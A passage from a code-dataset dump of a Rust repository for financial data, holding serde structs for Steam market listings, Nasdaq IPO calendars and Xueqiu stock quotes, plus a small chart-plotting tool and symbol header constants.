serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Listings {\n #[serde(flatten)]\n listings: HashMap<String, String>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Listing {\n pub listingid: String,\n pub price: Option<i64>,\n pub fee: Option<i64>,\n #[serde(rename = \"publisher_fee_app\")]\n pub publisher_fee_app: Option<i64>,\n #[serde(rename = \"publisher_fee_percent\")]\n pub publisher_fee_percent: String,\n pub currencyid: ::serde_json::Value,\n #[serde(rename = \"steam_fee\")]\n pub steam_fee: Option<i64>,\n #[serde(rename = \"publisher_fee\")]\n pub publisher_fee: Option<i64>,\n #[serde(rename = \"converted_price\")]\n pub converted_price: Option<i64>,\n #[serde(rename = \"converted_fee\")]\n pub converted_fee: Option<i64>,\n #[serde(rename = \"converted_currencyid\")]\n pub converted_currencyid: Option<i64>,\n #[serde(rename = \"converted_steam_fee\")]\n pub converted_steam_fee: Option<i64>,\n #[serde(rename = \"converted_publisher_fee\")]\n pub converted_publisher_fee: Option<i64>,\n #[serde(rename = \"converted_price_per_unit\")]\n pub converted_price_per_unit: Option<i64>,\n #[serde(rename = \"converted_fee_per_unit\")]\n pub converted_fee_per_unit: Option<i64>,\n #[serde(rename = \"converted_steam_fee_per_unit\")]\n pub converted_steam_fee_per_unit: Option<i64>,\n #[serde(rename = \"converted_publisher_fee_per_unit\")]\n pub converted_publisher_fee_per_unit: Option<i64>,\n pub asset: Asset,\n}\n\nimpl Listing {\n pub fn to_record(&self) -> Vec<String> {\n let mut rec = vec!(\n self.listingid.to_string(),\n utils::lilmatcher_i64(self.fee.clone()),\n utils::lilmatcher_i64(self.price.clone()),\n utils::lilmatcher_i64(self.publisher_fee_app.clone()),\n self.publisher_fee_percent.clone(),\n self.currencyid.to_string(),\n );\n rec.append(&mut Asset::to_record(&self.asset));\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Asset {\n pub currency: Option<i64>,\n pub appid: Option<i64>,\n pub contextid: Option<String>,\n pub id: Option<String>,\n pub classid: Option<String>,\n pub instanceid: Option<String>,\n pub amount: Option<String>,\n pub status: Option<i64>,\n #[serde(rename = \"original_amount\")]\n pub original_amount: Option<String>,\n #[serde(rename = \"unowned_id\")]\n pub unowned_id: Option<String>,\n #[serde(rename = \"unowned_contextid\")]\n pub unowned_contextid: Option<String>,\n #[serde(rename = \"background_color\")]\n pub background_color: Option<String>,\n #[serde(rename = \"icon_url\")]\n pub icon_url: Option<String>,\n #[serde(rename = \"icon_url_large\")]\n pub icon_url_large: Option<String>,\n pub descriptions: Option<Vec<Description>>,\n pub tradable: Option<i64>,\n #[serde(rename = \"owner_actions\")]\n pub owner_actions: Option<Vec<OwnerAction>>,\n pub name: Option<String>,\n pub name_color: Option<String>,\n #[serde(rename = \"type\")]\n pub type_field: Option<String>,\n #[serde(rename = \"market_name\")]\n pub market_name: Option<String>,\n #[serde(rename = \"market_hash_name\")]\n pub market_hash_name: Option<String>,\n #[serde(rename = \"market_fee_app\")]\n pub market_fee_app: Option<i64>,\n pub commodity: Option<i64>,\n #[serde(rename = \"market_tradable_restriction\")]\n pub market_tradable_restriction: Option<i64>,\n #[serde(rename = \"market_marketable_restriction\")]\n pub 
market_marketable_restriction: Option<i64>,\n #[serde(rename = \"market_actions\")]\n pub market_actions: Option<::serde_json::Value>,\n pub marketable: Option<i64>,\n #[serde(rename = \"app_icon\")]\n pub app_icon: Option<String>,\n pub owner: Option<i64>,\n #[serde(rename = \"new_id\")]\n pub new_id: Option<String>,\n #[serde(rename = \"new_contextid\")]\n pub new_contextid: Option<String>,\n}\n\nimpl Asset {\n pub fn to_record(&self) -> Vec<String> {\n let rec: Vec<String> = vec!(\n utils::lilmatcher(self.id.clone()),\n utils::lilmatcher(self.name.clone()),\n utils::lilmatcher_i64(self.appid.clone()),\n utils::lilmatcher(self.amount.clone()),\n utils::lilmatcher_i64(self.status.clone()),\n utils::lilmatcher_i64(self.currency.clone()),\n utils::lilmatcher_i64(self.tradable.clone()),\n );\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Description {\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub value: String,\n pub color: Option<String>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct OwnerAction {\n pub link: String,\n pub name: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Games {\n #[serde(flatten)]\n games: HashMap<String, AssetMap>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct AssetMap {\n #[serde(flatten)]\n assetmap: HashMap<String, Asset>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Purchase {\n pub listingid: String,\n pub purchaseid: String,\n #[serde(rename = \"paid_amount\")]\n pub paid_amount: i64,\n #[serde(rename = \"paid_fee\")]\n pub paid_fee: i64,\n pub currencyid: String,\n #[serde(rename = \"steam_fee\")]\n pub steam_fee: i64,\n #[serde(rename = \"publisher_fee\")]\n pub publisher_fee: i64,\n #[serde(rename = \"publisher_fee_percent\")]\n pub publisher_fee_percent: String,\n #[serde(rename = \"publisher_fee_app\")]\n pub publisher_fee_app: i64,\n pub asset: Asset,\n}\n\nimpl Purchase {\n pub fn to_record(&self) -> Vec<String> {\n let mut rec = vec!(\n self.listingid.to_string(),\n self.purchaseid.to_string(),\n self.paid_amount.to_string(),\n self.paid_fee.to_string(),\n self.steam_fee.to_string(),\n self.publisher_fee.to_string(),\n self.publisher_fee_app.to_string(),\n self.publisher_fee_percent.to_string(),\n );\n rec.append(&mut Asset::to_record(&self.asset));\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SteamAppData {\n pub appid: i64,\n pub name: String,\n pub icon: String,\n pub link: String,\n}\n\nimpl SteamAppData {\n pub fn to_record(&self) -> Vec<String> {\n let rec = vec!(\n self.appid.to_string(),\n self.name.to_string(),\n );\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct AppDatas {\n #[serde(flatten)]\n gamedata: HashMap<String, SteamAppData>,\n}\n\n// pub const STEAM_ASSET_HEADER: [&'static str; 6] = [];\npub const STEAM_LISTING_HEADER: [&'static 
str; 6] = [\n \"l_id\",\n \"l_price\",\n \"l_fee\",\n \"l_pub_fee_app\",\n \"l_pub_fee_pct\",\n \"l_currency_id\",\n];\n\n// pub const STEAM_ASSET_HEADER: [&'static str; 6] = [];\npub const STEAM_PURCHASE_HEADER: [&'static str; 8] = [\n \"p_listing_id\",\n \"p_id\",\n \"p_paid_amt\",\n \"p_paid_fee\",\n \"p_cur_id\",\n \"p_steam_fee\",\n \"p_pub_fee\",\n \"p_pub_fee_pct\",\n];\n\npub const STEAM_ASSET_HEADER: [&'static str; 7] = [\n \"a_id\",\n \"a_name\",\n \"a_appid\",\n \"a_amount\",\n \"a_status\",\n \"a_currency\",\n \"a_tradable\",\n];\n\n// pub const STEAM_ASSET_HEADER: [&'static str; 6] = [];\npub const STEAM_PURCHASE_HEADER2: [&'static str; 15] = [\n \"p_listing_id\",\n \"p_id\",\n \"p_paid_amt\",\n \"p_paid_fee\",\n \"p_cur_id\",\n \"p_steam_fee\",\n \"p_pub_fee\",\n \"p_pub_fee_pct\",\n \"a_id\",\n \"a_name\",\n \"a_appid\",\n \"a_amount\",\n \"a_status\",\n \"a_currency\",\n \"a_tradable\",\n];\n// pub const STEAM_PURCHASE_HEADER: [&'static str; 6] = [];\n\n\n" }, { "alpha_fraction": 0.6960651278495789, "alphanum_fraction": 0.7006444931030273, "avg_line_length": 30.51871681213379, "blob_id": "38053bb82a26236f7256bdb8c413691108471e50", "content_id": "c6e926415a387c32f4b292f784141c707a66b6ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 5896, "license_type": "no_license", "max_line_length": 95, "num_lines": 187, "path": "/finox/src/nasdaq/cal.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "/*\nftp://ftp.nasdaqtrader.com/SymbolDirectory/\n\nftp://ftp.nasdaqtrader.com/SymbolDirectory/bondslist.txt\nftp://ftp.nasdaqtrader.com/SymbolDirectory/bxoptions.txt\n\nhttps://api.nasdaq.com/api/quote/EURUSD/summary?assetclass=currencies\n\n*/\n\n//https://api.nasdaq.com/api/calendar/upcoming\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct CalendarRoot {\n pub data: Vec<Daum>,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Daum {\n pub splits_list: Option<Vec<SplitsList>>,\n pub name: String,\n pub event_count: i64,\n pub earnings_list: Option<Vec<EarningsList>>,\n pub dividends_list: Option<Vec<DividendsList>>,\n pub econs_list: Option<Vec<EconsList>>,\n pub ipos_list: Option<Vec<IposList>>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SplitsList {\n pub company_name: String,\n pub execution_date: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct EarningsList {\n pub company_name: String,\n pub date: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct DividendsList {\n pub company_name: String,\n pub ex_div_date: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct EconsList {\n pub event_name: String,\n pub time: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct IposList {\n pub company_name: String,\n pub 
price: String,\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub data: Data,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\n//https://api.nasdaq.com/api/ipo/calendar?date=2020-04\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Data {\n pub priced: Priced,\n pub upcoming: Upcoming,\n pub filed: Filed,\n pub withdrawn: Withdrawn,\n pub month: i64,\n pub year: i64,\n pub total_results: i64,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Priced {\n pub headers: ::serde_json::Value, //Headers,\n pub rows: Vec<Row>,\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row {\n #[serde(rename = \"dealID\")]\n pub deal_id: String,\n pub proposed_ticker_symbol: String,\n pub company_name: String,\n pub proposed_exchange: String,\n pub proposed_share_price: String,\n pub shares_offered: String,\n pub priced_date: String,\n pub dollar_value_of_shares_offered: String,\n pub deal_status: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Upcoming {\n pub upcoming_table: UpcomingTable,\n pub last_updated_time: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct UpcomingTable {\n pub headers: ::serde_json::Value, //Headers2,\n pub rows: Vec<Row2>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row2 {\n #[serde(rename = \"dealID\")]\n pub deal_id: String,\n pub proposed_ticker_symbol: String,\n pub company_name: String,\n pub proposed_exchange: String,\n pub proposed_share_price: String,\n pub shares_offered: String,\n pub expected_price_date: String,\n pub dollar_value_of_shares_offered: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Filed {\n pub headers: ::serde_json::Value, //Headers3,\n pub rows: Vec<Row3>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row3 {\n #[serde(rename = \"dealID\")]\n pub deal_id: String,\n pub proposed_ticker_symbol: Option<String>,\n pub company_name: String,\n pub filed_date: String,\n pub dollar_value_of_shares_offered: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Withdrawn {\n pub headers: ::serde_json::Value, //Headers4,\n pub rows: Vec<Row4>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row4 {\n #[serde(rename = \"dealID\")]\n pub deal_id: String,\n pub proposed_ticker_symbol: ::serde_json::Value,\n pub company_name: String,\n pub proposed_exchange: ::serde_json::Value,\n pub shares_offered: String,\n pub filed_date: String,\n pub dollar_value_of_shares_offered: String,\n pub 
withdraw_date: String,\n}\n\n//https://www.nasdaq.com/api/v1/recent-articles/undefined/500\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NewsRoot {\n pub title: String,\n pub url: String,\n pub ago: String,\n}\n\n\n" }, { "alpha_fraction": 0.5927860736846924, "alphanum_fraction": 0.6113184094429016, "avg_line_length": 29.454545974731445, "blob_id": "6e167580a85f064e431c12179cda276e362c3a15", "content_id": "3586251ab849c06353036fa7abd5974578570609", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 8040, "license_type": "no_license", "max_line_length": 309, "num_lines": 264, "path": "/finox/src/misc/xueqiu.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\nuse crate::utils;\n// MSFT,AAPL,AMZN,GOOGL,BABA,FB,BRKA,JNJ,WMT,V,PG,JPM,TSM,UNH,MA,INTC,VZ,HD,T,MRK,KO,PFE,NVS,BAC,DIS,PEP,NFLX,XOM,CSCO,NVDA,TM,CMCSA,ORCL,ABT,ADBE,CVX,CHL,LLY,SAP,NKE,TSLA,MDT,MCD,BMY,RDSA.AS,AZN,PYPL,TMO,PM,NEE\n// MSFT%2CAAPL%2CAMZN%2CGOOGL%2CBABA%2CFB%2CBRKA%2CJNJ%2CWMT%2CV%2CPG%2CJPM%2CTSM%2CUNH%2CMA%2CINTC%2CVZ%2CHD%2CT%2CMRK%2CKO%2CPFE%2CNVS%2CBAC%2CDIS%2CPEP%2CNFLX%2CXOM%2CCSCO%2CNVDA%2CTM%2CCMCSA%2CORCL%2CABT%2CADBE%2CCVX%2CCHL%2CLLY%2CSAP%2CNKE%2CTSLA%2CMDT%2CMCD%2CBMY%2CRDSA.AS%2CAZN%2CPYPL%2CTMO%2CPM%2CNEE\n// https://stock.xueqiu.com/v5/stock/realtime/quotec.json?\n// https://stock.xueqiu.com/v5/stock/history/trade.json?symbol=AAPL&count=20\n// https://stock.xueqiu.com/v5/stock/chart/minute.json?symbol=.DJI&period=1d\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct RealtimeQuotec {\n pub data: Vec<Quote>,\n #[serde(rename = \"error_code\")]\n pub error_code: i64,\n #[serde(rename = \"error_description\")]\n pub error_description: ::serde_json::Value,\n}\n\n\nimpl RealtimeQuotec {\n pub fn to_records(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for t in self.data.iter() {\n // println!(\"{:#?}\", t);\n recs.push(Quote::to_record(t));\n }\n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Quote {\n pub symbol: String,\n pub current: f64,\n pub percent: f64,\n pub chg: f64,\n pub timestamp: i64,\n pub volume: i64,\n pub amount: f64,\n #[serde(rename = \"market_capital\")]\n pub market_capital: f64,\n #[serde(rename = \"float_market_capital\")]\n pub float_market_capital: ::serde_json::Value,\n #[serde(rename = \"turnover_rate\")]\n pub turnover_rate: f64,\n pub amplitude: f64,\n pub open: f64,\n #[serde(rename = \"last_close\")]\n pub last_close: f64,\n pub high: f64,\n pub low: f64,\n #[serde(rename = \"avg_price\")]\n pub avg_price: f64,\n #[serde(rename = \"trade_volume\")]\n pub trade_volume: Option<i64>,\n pub side: i64,\n #[serde(rename = \"is_trade\")]\n pub is_trade: bool,\n pub level: i64,\n #[serde(rename = \"trade_session\")]\n pub trade_session: i64,\n #[serde(rename = \"trade_type\")]\n pub trade_type: ::serde_json::Value,\n #[serde(rename = \"current_year_percent\")]\n pub current_year_percent: f64,\n #[serde(rename = \"trade_unique_id\")]\n pub trade_unique_id: ::serde_json::Value,\n #[serde(rename = \"type\")]\n pub type_field: i64,\n #[serde(rename = \"bid_appl_seq_num\")]\n pub 
bid_appl_seq_num: ::serde_json::Value,\n #[serde(rename = \"offer_appl_seq_num\")]\n pub offer_appl_seq_num: ::serde_json::Value,\n}\n\nimpl Quote {\n pub fn to_record(&self) -> Vec<String> {\n let rec: Vec<String> = vec!(\n self.symbol.to_string(),\n self.timestamp.to_string(),\n self.current.to_string(),\n utils::lilmatcher_i64(self.trade_volume),\n self.volume.to_string(),\n self.open.to_string(),\n self.high.to_string(),\n self.low.to_string(),\n self.last_close.to_string(),\n self.avg_price.to_string(),\n self.amount.to_string(),\n self.percent.to_string(),\n self.chg.to_string(),\n self.market_capital.to_string(),\n self.turnover_rate.to_string(),\n self.amplitude.to_string(),\n self.current_year_percent.to_string(),\n self.level.to_string(),\n self.trade_session.to_string(),\n );\n\n return rec;\n }\n}\n\npub const snowballQuoteHeader: [&'static str; 19] = [\n \"symbol\",\n \"timestamp\",\n \"current\",\n \"trade_volume\",\n \"volume\",\n \"open\",\n \"high\",\n \"low\",\n \"last_close\",\n \"avg_price\",\n \"amount\",\n \"percent\",\n \"chg\",\n \"market_capital\",\n \"turnover_rate\",\n \"amplitude\",\n \"current_year_percent\",\n \"level\",\n \"trade_session\",\n];\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct TradeHistory {\n pub data: Trades,\n #[serde(rename = \"error_code\")]\n pub error_code: i64,\n #[serde(rename = \"error_description\")]\n pub error_description: String,\n}\n\n\nimpl TradeHistory {\n pub fn to_records(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for t in self.data.items.iter() {\n println!(\"{:#?}\", t);\n recs.push(Trade::to_record(t));\n }\n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Trades {\n pub symbol: String,\n pub items: Vec<Trade>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Trade {\n pub symbol: String,\n pub timestamp: i64,\n pub current: f64,\n pub chg: f64,\n pub percent: f64,\n #[serde(rename = \"trade_volume\")]\n pub trade_volume: i64,\n pub side: i64,\n pub level: i64,\n #[serde(rename = \"trade_session\")]\n pub trade_session: i64,\n #[serde(rename = \"trade_type\")]\n pub trade_type: Option<String>,\n #[serde(rename = \"trade_unique_id\")]\n pub trade_unique_id: String,\n #[serde(rename = \"bid_appl_seq_num\")]\n pub bid_appl_seq_num: ::serde_json::Value,\n #[serde(rename = \"offer_appl_seq_num\")]\n pub offer_appl_seq_num: ::serde_json::Value,\n}\n\n\nimpl Trade {\n pub fn to_record(&self) -> Vec<String> {\n let rec: Vec<String> = vec!(\n self.symbol.to_string(),\n self.timestamp.to_string(),\n self.current.to_string(),\n self.chg.to_string(),\n self.percent.to_string(),\n self.trade_volume.to_string(),\n self.side.to_string(),\n self.level.to_string(),\n utils::lilmatcher(self.trade_type.clone()),\n self.trade_unique_id.to_string(),\n );\n return rec;\n }\n}\n\npub const snowballTradeHeader: [&'static str; 10] = [\n \"symbol\",\n \"timestamp\",\n \"current\",\n \"chg\",\n \"percent\",\n \"trade_volume\",\n \"side\",\n \"level\",\n \"trade_type\",\n \"trade_unique_id\",\n];\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SnowballMinute {\n pub data: MinuteData,\n 
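// annotation, not part of the source file: SnowballMinute repeats the same
// envelope as RealtimeQuotec and TradeHistory above -- a `data` payload plus
// `error_code` / `error_description` -- so a generic wrapper parameterized
// over the payload type could deduplicate all three response shells.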
#[serde(rename = \"error_code\")]\n pub error_code: i64,\n #[serde(rename = \"error_description\")]\n pub error_description: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct MinuteData {\n #[serde(rename = \"last_close\")]\n pub last_close: f64,\n pub items: Vec<MinuteQuote>,\n #[serde(rename = \"items_size\")]\n pub items_size: i64,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct MinuteQuote {\n pub current: f64,\n pub volume: i64,\n #[serde(rename = \"avg_price\")]\n pub avg_price: f64,\n pub chg: f64,\n pub percent: f64,\n pub timestamp: i64,\n pub amount: f64,\n pub high: f64,\n pub low: f64,\n pub macd: ::serde_json::Value,\n pub kdj: ::serde_json::Value,\n pub ratio: ::serde_json::Value,\n pub capital: ::serde_json::Value,\n #[serde(rename = \"volume_compare\")]\n pub volume_compare: VolumeCompare,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct VolumeCompare {\n #[serde(rename = \"volume_sum\")]\n pub volume_sum: i64,\n #[serde(rename = \"volume_sum_last\")]\n pub volume_sum_last: i64,\n}\n" }, { "alpha_fraction": 0.5027567148208618, "alphanum_fraction": 0.5251550674438477, "avg_line_length": 28.612245559692383, "blob_id": "ed013ae7cab07f8f54ed1ac113158e6df991f8ff", "content_id": "9707ab88653a676f56fbd99763b0ea0af0e88885", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2902, "license_type": "no_license", "max_line_length": 89, "num_lines": 98, "path": "/viz/src/main.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate plotters;\nuse chrono::DateTime;\nuse plotters::prelude::*;\nuse serde::Deserialize;\nuse std::env;\n#[derive(Debug, PartialOrd, PartialEq, Clone, Default, Deserialize)]\nstruct YfRow {\n symb: String,\n t: f32,\n o: f32,\n h: f32,\n l: f32,\n c: f32,\n v: u64,\n}\n\n#[derive(Debug, PartialOrd, PartialEq, Clone, Default, Deserialize)]\nstruct RtRow {\n symbol: String,\n t: String,\n x: f32,\n v: u64,\n}\n\nfn main() -> Result<(), Box<dyn std::error::Error>> {\n let args = env::args().collect::<Vec<String>>();\n if args.len() != 3 {\n panic!(\"arg 2: folder, arg 3: file_name. 
this looks in ../data/\");\n }\n let input_fold = args[1].clone();\n let input_fn = args[2].clone();\n //let data: Vec<YfRow> = get_data(&input_fold, &input_fn);\n let data: Vec<RtRow> = get_data(&input_fold, &input_fn);\n let xs = data.iter().map(|x| x.x).collect::<Vec<f32>>();\n let ts = data\n .iter()\n .map(|x| DateTime::parse_from_rfc3339(&x.t).unwrap().timestamp())\n .collect::<Vec<i64>>();\n //let closes = data.iter().map(|x| x.c).collect::<Vec<f32>>();\n //let min =\n let plot_fn = format!(\"../data/viz/{}.png\", input_fn);\n let root = BitMapBackend::new(&plot_fn, (640, 480)).into_drawing_area();\n root.fill(&WHITE)?;\n let mut chart = ChartBuilder::on(&root)\n .caption(input_fn, (\"sans-serif\", 50).into_font())\n .margin(5)\n .x_label_area_size(30)\n .y_label_area_size(30)\n .build_ranged(\n ts[0]..ts[data.len() - 1],\n //closes[0]..closes[closes.len() - 1],\n xs[0]..xs[xs.len() - 1],\n )?;\n\n let to_plot = data\n .iter()\n .map(|x| (DateTime::parse_from_rfc3339(&x.t).unwrap().timestamp(), x.x))\n .into_iter();\n\n chart.configure_mesh().draw()?;\n let series = LineSeries::new(to_plot, &RED);\n chart.draw_series(series);\n\n //chart\n // .draw_series(data.iter().map(|x| {\n // CandleStick::new(\n // //DateTime::parse_from_rfc3339(x.t).unwrap_or(panic!(\"fuck dates\")),\n // x.t, x.o, x.h, x.l, x.c, &GREEN, &RED, 15,\n // )\n // }))?\n // .label(\"y = x^2\")\n // .legend(|(x, y)| PathElement::new(vec![(x, y), (x + 20, y)], &RED));\n\n chart\n .configure_series_labels()\n .background_style(&WHITE.mix(0.8))\n .border_style(&BLACK)\n .draw()?;\n\n Ok(())\n}\n\npub fn get_data<'a, T: ?Sized>(folder: &str, file_name: &str) -> Vec<T>\nwhere\n for<'de> T: serde::Deserialize<'de> + 'a,\n{\n let file_name_fmtd = format!(\"../data/{}/{}\", folder, file_name);\n let mut rdr = csv::Reader::from_path(file_name_fmtd.clone()).expect(&file_name_fmtd);\n let iter = rdr.deserialize();\n let mut recs = vec![];\n for res in iter {\n if let Ok(r) = res {\n let rec: T = r;\n recs.push(rec);\n }\n }\n recs\n}\n" }, { "alpha_fraction": 0.48017334938049316, "alphanum_fraction": 0.49924159049987793, "avg_line_length": 21.512195587158203, "blob_id": "6a0e9c51282ada46974586add44ff88afd13e58f", "content_id": "8862ff725d6527dde8be87b88e17cdf54aa7c3ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 4615, "license_type": "no_license", "max_line_length": 163, "num_lines": 205, "path": "/finox/src/headers.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "pub const BLOOMBERG_CURRENCY_SYMBOLS: [&'static str; 40] = [\n \"USD\", \"EUR\", \"XAU\", \"XAG\", \"XPT\", \"XPD\", \"JPY\", \"GBP\", \"AUD\", \"CAD\", \"CHF\", \"KRW\", \"MXN\",\n \"BRL\", \"CLP\", \"COP\", \"PEN\", \"CRC\", \"ARS\", \"SEK\", \"DKK\", \"NOK\", \"CZK\", \"SKK\", \"PLN\", \"HUF\",\n \"RUB\", \"TRY\", \"ILS\", \"KES\", \"ZAR\", \"MAD\", \"NZD\", \"PHP\", \"SGD\", \"IDR\", \"CNY\", \"INR\", \"MYR\",\n \"THB\",\n];\n// USD,EUR,XAU,XAG,XPT,XPD,JPY,GBP,AUD,CAD,CHF,KRW,MXN,BRL,CLP,COP,PEN,CRC,ARS,SEK,DKK,NOK,CZK,SKK,PLN,HUF,RUB,TRY,ILS,KES,ZAR,MAD,NZD,PHP,SGD,IDR,CNY,INR,MYR,THB,\npub const BLOOMBERG_NEWS_SYMBOLS: [&'static str; 5] = [\n \"GOVERNMENT_BOND\",\n \"COMMODITY\",\n \"COMMON_STOCK\",\n \"CURRENCY\",\n \"BLOOMBERG_BARCLAYS_INDEX\",\n];\n\npub const BLOOMBERG_COMMODITIES_SYMBOLS: [&'static str; 37] = [\n \"CO1\", \"CL1\", \"XB1\", \"NG1\", \"HO1\", \"GC1\", \"SI1\", \"HG1\", \"C%201\", \"W%201\", \"CC1\", \"CT1\", \"LC1\",\n \"QS1\", \"JX1\", \"MO1\", 
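// annotation, not part of the source file: "CT1" appears twice in this
// commodities list (after "CC1" above and again after "JO1" below), so the
// declared length of 37 counts cotton twice; dedup before fanning out
// per-symbol requests if duplicate symbols matter downstream.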
